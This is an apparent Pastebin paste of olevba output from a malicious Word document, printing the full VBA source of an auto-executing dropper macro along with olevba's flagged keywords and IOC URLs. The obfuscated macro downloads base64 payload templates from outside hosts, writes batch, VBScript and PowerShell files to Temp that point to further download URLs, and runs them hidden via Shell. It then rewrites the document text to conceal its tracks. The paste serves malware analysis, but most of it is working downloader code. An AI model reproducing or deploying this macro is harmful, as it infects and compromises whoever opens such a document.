dynamoo

Malicious Word macro

Apr 16th, 2015
446
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- automa~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: automa~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: automa~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Auto_Open()
  16.     huefhiuwefhwefh
  17. End Sub
  18. Sub huefhiuwefhwefh()
  19.     Dim huwe, auwd As Integer
  20.     Dim retVal As Variant
  21.     HUWQD = Module1.Huwd(10000)
  22.     FL2 = "" & HUWQD
  23.     HPPSDJ = "Temp"
  24.     PH2 = Module1.Bad("" & HPPSDJ) + "\"
  25.     NDUWGD = "461237618273612"
  26.    
  27.     HYWDAX = "baUhdwuqhdiqwududqwwgdjssadt"
  28.     WKDOQ = NDUWGD
  29.     PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
  30.     + _
  31.     "1"
  32.     VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
  33.     huwe = 1
  34.     BAFL = FL2 + Chr(Sgn(-22) + 11 + 10 + 25 + huwe + 0) + Left(HYWDAX, 2) + Right(HYWDAX, 1)
  35.    
  36.     INTG = "o" & "bject"
  37.     AFTG = "module"
  38.    
  39.     SXE = "" & Chr(Asc(".")) & Chr(Asc("e")) & "xe" & ""
  40.     GNG = ".png"
  41.    
  42.     PHT = "" & "htt" & "p://" & ""
  43.     SPIC = PHT + "sav" & "epic.su/"
  44.      
  45.     PSPTH = PH2 + PSFL
  46.     VBPTH = PH2 + VBFL
  47.     BAPTH = PH2 + BAFL
  48.  
  49.     DRT = FreeFile
  50.     BFT = FreeFile
  51.     CFT = FreeFile
  52.     DFT = FreeFile
  53.     EFT = FreeFile
  54.    
  55.    
  56.     PBIN = PHT + "hpg.se/tmp/1623782.txt"
  57.    
  58.     Dim obg, obg4 As Object
  59.     Dim asdwq As String
  60.     Set obg = CreateObject("MSXML2.ServerXMLHTTP")
  61.     obg.Open "GET", PBIN
  62.     obg.Send ""
  63.     CONT = obg.ResponseText
  64.     asdwq = CONT
  65.    
  66.     HQUWDAAA = "0"
  67.     If (asdwq = "") Then
  68.         PBIN = PHT + "sundsvallsrk.nu/tmp/1623782.txt"
  69.         Set obg4 = _
  70.         CreateObject("MSXML2.ServerXMLHTTP")
  71.         obg4.Open "GET", PBIN
  72.         obg4.Send ""
  73.         CONT = obg.ResponseText
  74.         asdwq = CONT
  75.         HQUWDAAA = "1"
  76.     End If
  77.    
  78.     CONT = Module1.Decode(asdwq)
  79.    
  80.     TVT10 = Module1.Tort(CONT, "text10")
  81.     TVT20 = Module1.Tort(CONT, "text20")
  82.     TVT21 = Module1.Tort(CONT, "text21")
  83.     TVT30 = Module1.Tort(CONT, "text30")
  84.     TVT31 = Module1.Tort(CONT, "text31")
  85.     XPT1 = Module1.Tort(CONT, "stext1")
  86.     XPT2 = Module1.Tort(CONT, "stext2")
  87.     XPT3 = Module1.Tort(CONT, "stext3")
  88.    
  89.     WVR = Module1.Bad("USERPROFILE")
  90.     post1 = InStr(WVR, "sers\")
  91.     If (post1 <> 0) Then
  92.         VRR = "1"
  93.     Else
  94.         VRR = "0"
  95.     End If
  96.    
  97.      Module1.WaitFor (1)
  98.    
  99.     Dim obg2 As Object
  100.     Set obg2 = _
  101.     CreateObject("MSXML2.ServerXMLHTTP")
  102.     MIWDWQ = "http://hpg.se/tmp/lns.txt"
  103.     If (HQUWDAAA = "1") Then
  104.         MIWDWQ = "http://sundsvallsrk.nu/tmp/lns.txt"
  105.     End If
  106.     obg2.Open "GET", MIWDWQ
  107.     obg2.Send ""
  108.     SEXX = obg2.ResponseText
  109.    
  110.     PSTB = PBIN + "123123123"
  111.     STAR1 = SPIC + "5550684" + GNG
  112.     STAR2 = SPIC + "5540444" + GNG
  113.     FFQ = "8"
  114.     FF = FFQ + SXE
  115.    
  116.    
  117.      If (VRR = "0") Then
  118.      Open BAPTH For Output As #DRT
  119.      Print #DRT, XPT1
  120.      Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
  121.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  122.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  123.      Print #DRT, XPT2
  124.      Close #DRT
  125.      
  126.      Module1.WaitFor (2)
  127.      
  128.      Open VBPTH For Output As #BFT
  129.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  130.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  131.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  132.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  133.      Print #BFT, XPT3
  134.      Close #BFT
  135.      
  136.      Module1.WaitFor (2)
  137.      NTH1 = Module1.Freat(retVal, BAPTH)
  138.      
  139.      End If
  140.      
  141.      If (VRR = "1") Then
  142.      Open PSPTH For Output As #CFT
  143.      Print #CFT, "$aisjd = '123';"
  144.      Print #CFT, "$stat = '" + STAR2 + "';"
  145.      Print #CFT, "$ggtt  = '" + SEXX + "';"
  146.      Print #CFT, "$pths = '" + PH2 + "';"
  147.      Print #CFT, "$wehs = '" + FL2 + "';"
  148.      Print #CFT, "$nnm = '" + FFQ + "';"
  149.      Print #CFT, TVT10
  150.      Close #CFT
  151.      
  152.      Open VBPTH For Output As #DFT
  153.      Print #DFT, TVT30
  154.      Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
  155.      Print #DFT, TVT31
  156.      Close #DFT
  157.    
  158.      Open BAPTH For Output As #EFT
  159.      Print #EFT, "@echo off"
  160.      Print #EFT, TVT20
  161.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  162.      Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
  163.      Print #EFT, TVT21
  164.      Close #EFT
  165.      Module1.WaitFor (1)
  166.    
  167.      NTH2 = Module1.Freat(retVal, BAPTH)
  168.      
  169.     End If
  170.  
  171.     JUW = Chr(47)
  172.     AKK = Chr(60)
  173.     ZKK = ">"
  174.     NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  175.     NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  176.     NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
  177.     NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
  178.     NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
  179.     NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
  180.  
  181. End Sub
  182. Sub AutoOpen()
  183.     Auto_Open
  184. End Sub
  185. Sub Workbook_Open()
  186.     Auto_Open
  187. End Sub
  188. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  189. ANALYSIS:
  190. +------------+----------------------+-----------------------------------------+
  191. | Type       | Keyword              | Description                             |
  192. +------------+----------------------+-----------------------------------------+
  193. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  194. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
  195. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  196. | Suspicious | CreateObject         | May create an OLE object                |
  197. | Suspicious | Open                 | May open a file                         |
  198. | Suspicious | Output               | May write to a file (if combined with   |
  199. |            |                      | Open)                                   |
  200. | Suspicious | Print #              | May write to a file (if combined with   |
  201. |            |                      | Open)                                   |
  202. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  203. |            |                      | strings                                 |
  204. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  205. |            |                      | be used to obfuscate strings (option    |
  206. |            |                      | --decode to see all)                    |
  207. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  208. |            |                      | may be used to obfuscate strings        |
  209. |            |                      | (option --decode to see all)            |
  210. | IOC        | http://hpg.se/tmp/ln | URL                                     |
  211. |            | s.txt                |                                         |
  212. | IOC        | http://sundsvallsrk. | URL                                     |
  213. |            | nu/tmp/lns.txt       |                                         |
  214. +------------+----------------------+-----------------------------------------+
  215. -------------------------------------------------------------------------------
  216. VBA MACRO Module1.bas
  217. in file: automa~1.doc - OLE stream: u'Macros/VBA/Module1'
  218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  219. Public Function Huwd(a As Integer)
  220. Huwd = CStr(Int((a * Rnd) + 10000))
  221. End Function
  222.  
  223. Sub WaitFor(NumOfSeconds As Long)
  224. Dim SngSec As Long
  225. SngSec = Timer + NumOfSeconds
  226. Do While Timer < SngSec
  227. DoEvents
  228. Loop
  229. End Sub
  230. Public Function Freat(a As Variant, b)
  231. a = _
  232. Shell(b, 0)
  233. Freat = a
  234. End Function
  235.  
  236. Public Function Tort(a, b As String)
  237. Dim krd, lent As Integer
  238. krd = InStr(1, a, "<" + b + ">") + 8
  239. lent = InStr(1, a, "<" + "/" + b + ">") - krd
  240. KLMN = Mid(a, krd, lent)
  241. AUHWUD = KLMN
  242. Tort = AUHWUD
  243. End Function
  244. Public Function Dtgt(a As String)
  245. Quick = GetObject(a)
  246. End Function
  247.  
  248. Public Function Quick(a As String)
  249. Quick = GetObject(a)
  250. End Function
  251.  
  252. Public Function Bad(a As String)
  253. Bad = _
  254. Environ(a)
  255. End Function
  256.  
  257.  
  258. Public Function Decode(ByVal strData As String) As String
  259.     Dim objXML As Object
  260.     Dim objNode As Object
  261.     Set objXML = CreateObject("MSXML2.DOMDocument")
  262.     Set objNode = objXML.createElement("b64")
  263.     objNode.DataType = "bin.base64"
  264.     objNode.Text = strData
  265.     WUDHA = objNode.nodeTypedValue
  266.     Decode = WUDHA
  267.     Set objNode = Nothing
  268.     Set objXML = Nothing
  269. End Function
  270.  
  271.  
  272. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  273. ANALYSIS:
  274. +------------+--------------+-----------------------------------------+
  275. | Type       | Keyword      | Description                             |
  276. +------------+--------------+-----------------------------------------+
  277. | Suspicious | CreateObject | May create an OLE object                |
  278. | Suspicious | Shell        | May run an executable file or a system  |
  279. |            |              | command                                 |
  280. | Suspicious | Environ      | May read system environment variables   |
  281. +------------+--------------+-----------------------------------------+
  282. -------------------------------------------------------------------------------
  283. VBA MACRO Module2.bas
  284. in file: automa~1.doc - OLE stream: u'Macros/VBA/Module2'
  285. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  286. Public Function Nybdqwd(a As String, b As String, c As Integer)
  287. Dim selectedText As String
  288. Dim hhhg, selRange As Range
  289. Set hhhg = ActiveDocument.Range
  290. With hhhg.Find
  291. .Text = a
  292. .MatchWholeWord = True
  293. hhhg.Find.Execute
  294. hhhg.Collapse direction:=wdCollapseEnd
  295. NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
  296. Set selRange = ActiveDocument.Range
  297. QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
  298. selRange.Start = hhhg.End
  299. .Text = b
  300. .MatchWholeWord = True
  301. .Execute
  302. hhhg.Collapse direction:=wdCollapseStart
  303. selRange.End = hhhg.Start
  304. If (c = 1) Then
  305.     selectedText = selRange.Delete
  306. End If
  307. If (c = 2) Then
  308.     selRange.Font.Color = wdColorBlack
  309. End If
  310. If (c = 3) Then
  311.     With hhhg.Find
  312.     .Text = a
  313.     .Replacement.Text = Chr(32)
  314.     .Wrap = wdFindContinue
  315.     .Execute Replace:=wdReplaceAll
  316.     End With
  317. End If
  318.  
  319. End With
  320. End Function
  321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  322. ANALYSIS:
  323. +------------+---------+-----------------------------------------+
  324. | Type       | Keyword | Description                             |
  325. +------------+---------+-----------------------------------------+
  326. | Suspicious | Chr     | May attempt to obfuscate specific       |
  327. |            |         | strings                                 |
  328. +------------+---------+-----------------------------------------+
RAW Paste Data